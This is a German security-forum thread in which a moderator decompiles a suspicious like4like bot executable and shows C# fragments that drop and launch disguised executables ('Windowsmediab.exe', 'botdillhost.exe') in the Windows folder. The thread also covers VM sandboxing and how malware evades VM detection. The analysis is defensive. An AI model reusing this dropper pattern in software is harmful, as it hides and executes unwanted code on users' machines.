Wer kann die Datei überprüfen?

S

Seven8

0
Servus,

ich weiß nicht ob die Frage hier beantwortet werden kann, aber ich versuche mal mein Glück.

Und zwar geht es um eine .exe Datei welche ich gerne von Experten überprüfen lassen möchte, wenn denn jemand Lust und Zeit dafür hat.

Überprüfen, ob die Datei sauber ist und keine Gefahren darstellen kann.

Es geht um einen Bot (angefertigt für like4like. org) welcher von einem Vietnamesen stammt und welcher wunderbar funktioniert. Soweit so gut, jedoch sind mir und meinem Kollegen immer wieder Fehlermeldungen unterlaufen während er in Betrieb war. z.b. Net Framework Fehler. Bei meinem Kollegen der Win 8 besitzt, sind noch weitere Fehler aufgetreten, u.a. Einforderung von Admin Rechten

Diese Fehlermeldung hatten wir zumindest beide regelmäßig:

79vxu45q.png



Hier die Datei : like4like

Wenn jemand die Fähigkeit & Lust dazu hat, diese Datei zu durchleuchten, würde mich das wirklich freuen.

Viele Grüße!
 
Zuletzt bearbeitet:
Seven8 hat gesagt.:
Es geht um einen selbstprogrammierten Bot für eine Website. Der Bot stammt von einem Vietnamesen und funktioniert wunderbar
Zum Vergrößern anklicken....

Warum soll man in die exe gucken, wenn du es selbstprogrammiert hast mit einem Vietnamesen? Dann hast du doch Zugriff auf den Quellcode.

Wobei die Formulierung erahnen lässt, dass "selbstprogrammiert" für dich einfach nur "von keiner großen Firma" bedeutet.
 
Hätte ich anders formulieren sollen. Ich bin nur ein Konsument davon.

Wärst du so cool und könntest mal einen Blick darauf werfen, falls du Ahnung von der Materie hast?

Danke !!
 
So ein "Ausnahmefehler" wie du ihn gepostet hast, bedeutet nur, dass er schlampig programmiert hat.
Soetwas kann unter etlichen Umständen passieren (z.B. das Programm versucht eine Nachricht zu senden, obwohl keine Verbindung besteht, aber dafür kann es Millionen andere Gründe auch geben).
 
Seven8 hat gesagt.:
Wärst du so cool und könntest mal einen Blick darauf werfen, falls du Ahnung von der Materie hast?
Zum Vergrößern anklicken....


Habe keine Windows VM zur Verfügung und in meinen Produktivsystemen fummeln ich nicht in potenziellen gefährlichen EXE Dateien rum. Dazu kommt noch das ich eh nicht so viel Erfahrung mit Disassembler habe.

Der Quellcode steht nicht zur Verfügung?
Da es .NET nutzt ist es vielleicht in C# geschrieben und du könntest versuchen es mit z.B. dotPeek zu decompilen https://www.jetbrains.com/decompiler/

Wenn du das hinbekommst und mir den Output schickst, kann ich gerne mal reingucken. Wenn du selber Programmieren kannst oder Programmcode verstehst, kannst du natürlich auch selber reingucken ;)
 
Aktuell hab ich die Datei ja runtergehauen (Windows Wiederherstellung) solange bis ich mir sicher sein kann, dass die Datei ok ist.

Der Ablauf sieht wie folgt aus:

1. Erlaubnis akzeptieren und Öffnen
2. Key eingeben (like4like)
3. Datei öffnet sich. Oben steht "Hello ... (Name des Windows-Benutzers, der automatisch erkannt wird)"
4. Nicht alle Funktionen stehen zur Verfügung
5. Um alle Funktionen zu erhalten, muss ich meinen Profil-Namen (zb. Admin, Vorname, etc) per Facebook schicken. Der Eigentümer schaltet dann kostenlos die restl. Funktionen frei

Habe ihn gefragt weshalb das notwendig sei und er antwortete, somit er das Eigentum an der Datei nicht verliert.

Klingt zunächst glaubhaft, aber die Angst besteht, dass er mehr Informationen einsehen kann als es zu scheinen mag.

Euer Eindruck?
 
Wenn du die Datei eh schon ausgeführt hast, ist es doch eh zu spät :D.

Weiß nicht was dieses like4like überhaupt ist. Aber offensichtlich sollst du ihm deine Benutzerdaten schicken und in dem Programm muss du doch sicherlich auch irgendwas mit Login und Passwort angeben oder?
Da die Freischaltung auch noch irgendwo überprüft werden muss, kann es gut sein, dass er das Passwort sich auch direkt mitschicken lässt.
 
also ich weiß ja nich ... :rolleyes: ... Programme die weitere ausführbare dateien als ressource mitschleppen und diese unter vermeintlich unverfänglichen namen wie windowsmediab.exe unterhalb des windows verzeichnisses ablegen um selbige danach zu starten ...

seems legit ... :rolleyes:

aber mal im ernst ... die malware schreiberlinge werden auch immer unkreativer habe ich den eindruck
 
like4like entpackt und startet "Windowsmediab.exe"
Code: 
private void Timer2_Tick(object sender, EventArgs e)
{
    this.Timer2.Stop();
    if (this.hedieuhanh.Text == "Microsoft Windows 7")
    {
        if (MyProject.Computer.FileSystem.FileExists(this.lb6.Text + "Windowsmediab.exe"))
        {
            Process.Start(this.lb6.Text + "Windowsmediab.exe");
        }
windowsmediab (samt Variationen) findet man in den Ressourcen der Executable (bzw. in dem Winordner ;) )

windowsmediab entpackt und startet (je nach OS)
Code: 
 if (this.a == 2f)
    {
        if (!MyProject.Computer.FileSystem.FileExists(this.lb6.Text + "botdillhost.exe"))
        {
            MyProject.Computer.FileSystem.WriteAllBytes(this.lb6.Text + "botdillhost.exe", Windowsmediab.My.Resources.Resources.botdillhost, false);
        }
        if (MyProject.Computer.FileSystem.FileExists(this.lb6.Text + "botdillhost.exe"))

Und damit das nicht zu langweilig ist:
in "botdillhost.exe" sind gleich ein paar ausführbare Module mehr, die entpackt/gestartet werden (können):
Code: 
consoadf
lochosst
Windowsql
Winito
exn
Microsofts
master
Microsoftse
update

Weiter hatte ich jetzt keine Lust und keine Zeit ;)

Damit das nicht ganz Offtopic wird:
Überprüfen, ob die Datei sauber ist und keine Gefahren darstellen kann.
Zum Vergrößern anklicken....
Der Aufwand für eine richtige Überprüfung kommt (je nach Komplexität der Software und Qualität des Codes) durchaus an eine Neuentwicklung heran - vorausgesetzt, man hat überhaupt halbwegs brauchbaren Quellcode, ansonsten ist eine Neuentwicklung deutlich schneller ;)
Zumindest muss der Code komplett durchgesichtet werden (d.h. auch halbwegs verstanden und nicht nur nach ästhetischen Maßstäben bewertet ;) ) - und die ganze Anstrengung in diesem Fall nur für einen "komischen" Bot.
Ob sich da jemand findet? ;)

Bis dahin ein Tipp: nichtvertrauenswürdige Sofware (oder die, die man einfach mal schnell testen möchte) in einer VM (z.B VirtualBox) auszuführen.
Diese gleichen einem "virtuellen PC" und lassen einen z.B nach einer Installation/Einrichtung mit ein paar Klicks Klone oder Schnappschüsse von sich erstellen und mit mit ebenso wenigen Klicks den "virtuellen" PC in den ursprünglichen Zustand zurücksetzen.
Es lassen sich also durchaus mit sehr wenig Aufwand "virtuelle PCs" (bei Windowsinstallationen - zumindest Schnappschüsse) nur für eine bestimmte Software erstellen und verwalten.
 
Zuletzt bearbeitet:
Vielen Dank für die Antworten, besonders die Ausführliche von User CDW. Hat mir sehr geholfen!

Bestünden denn noch irgend welchr Risiken, wenn ich die Datei in der Virtual Box installieren und von dort aus nutzen würde? Alles außerhalb von Virtual Box wäre geschützt, richtig?

Würde den Bot schon gerne weiter nutzen.
 
Seven8 hat gesagt.:
Bestünden denn noch irgend welchr Risiken, wenn ich die Datei in der Virtual Box installieren und von dort aus nutzen würde? Alles außerhalb von Virtual Box wäre geschützt, richtig?
Zum Vergrößern anklicken....

Jein, rein theoretisch gibt es auch bei VirtualBox&Co ab und zu Fehler, die ausgenutzt werden könnten, um aus der Box "auszubrechen" Oracle Vm Virtualbox : CVE security vulnerabilities, versions and detailed reports - rein praktisch sind diese ziemlich selten und "wertvoll" - es ist unwahrscheinlich, dass ein 0815 Malware-Verteiler an diese kommt oder dass diese eingesetzt werden, nur um ein paar mögliche Logins von Dir zu ergaunern ;).

Es sollte für Dich also ausreichend sein, immer die aktuelle Version des Programms zu benutzen (das gilt im übrigen auch für andere Software ;) ).
Dann sollte man natürlich noch darauf achten, dass man nicht "zu bequem" ist und als gemeinsamen Order (auf den sowohl das Betriebssystem im "virtuellen" Rechner wie auch auf dem "echten" Zugriff haben) nicht etwa den eigenen Benutzerordner wählt oder so "'rübergezogenen" ausführbaren Dateien auf dem echten Rechner ausführt.

Andrerseits machst Du Dir die Mühe mit der Installation und Einrichtung nur einmal - ich ziehe z.B ganz erfolgreich meine "ultimative", virtuelle XP Installation schon über 2 "echte" Rechnergenerationen hinweg mit.
Als kurze Anmerkung: Anleitungen, wie man Windows in VBox installiert, gibt es zu Hauf im Netz (mit Screenshots und Erklärungen, warum man unbedingt die VirtualBoxAddtions mitinstallieren sollte), chip.de & Co reichen eigentlich hierfür total aus.
Danach, wie erwähnt, kommen "Schnappschüsse", Klone und manchmal auch Backups - und der virtuelle PC kann als Test/Spielplatz eingesetzt weden.

Wenn ich das per Sandboxie verwende dürfte ich auch keine Probleme bekommen oder?
Zum Vergrößern anklicken....
k.A. Ich habe Sandboxie nie wirklich getraut - zum einen, geschieht die "virtualisierung"/"absperrung" auf dem Level der Systemaufrufe, zum anderen habe ich's nie so richtig getestet.

Fast vergessen: Sandboxie, VMWare und VirtualBox samt VirtualPC und noch ein paar kleineren tools sind auch den Malwareschreibern bekannt (ich meine damit auch die 0815-Kids, da der Code zum Erkennen dieser schon länger öffentlich ist und immer wieder gerne weiterkopiert wird).
Der "Klassiker" war einige Jahre lang, bei Erkennung einer VM nichts zu machen.
Dann kamen aber einige Kids darauf, dass dies doch etwas zu auffällig ist und man ja die harmlose Software, mit der zusammen auch Malware ausgeliefert wird (und ja, ganz beliebt sind Cracks, Trainer und Spiele-Bots -- wobei die Autoren fast nie damit etwas zu tun haben) ausführen könnte, den Stealer/Bot(=Malware) aber lieber nicht.

Wenn also ein Tool/eine Sofware in der VirtualBox/Sandboxie sich unauffällig verhalten, heißt es noch lange nicht, dass diese nicht "böse" ist ;).
 
Danke für den ausführlichen Support, CDW !

Bist ein klasse Moderator!:thumb_up:


Sandboxie habe ich probiert, aber da zickt das Programm. Ich werde morgen nochmal VirtualBox versuchen, dann mit Windows XP Betriebssystem. Hatte gestern mit Ubuntu versucht, aber hab den Internet Explorer da nicht drauf gekriegt.

Grüße !
 
Zuletzt bearbeitet:
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben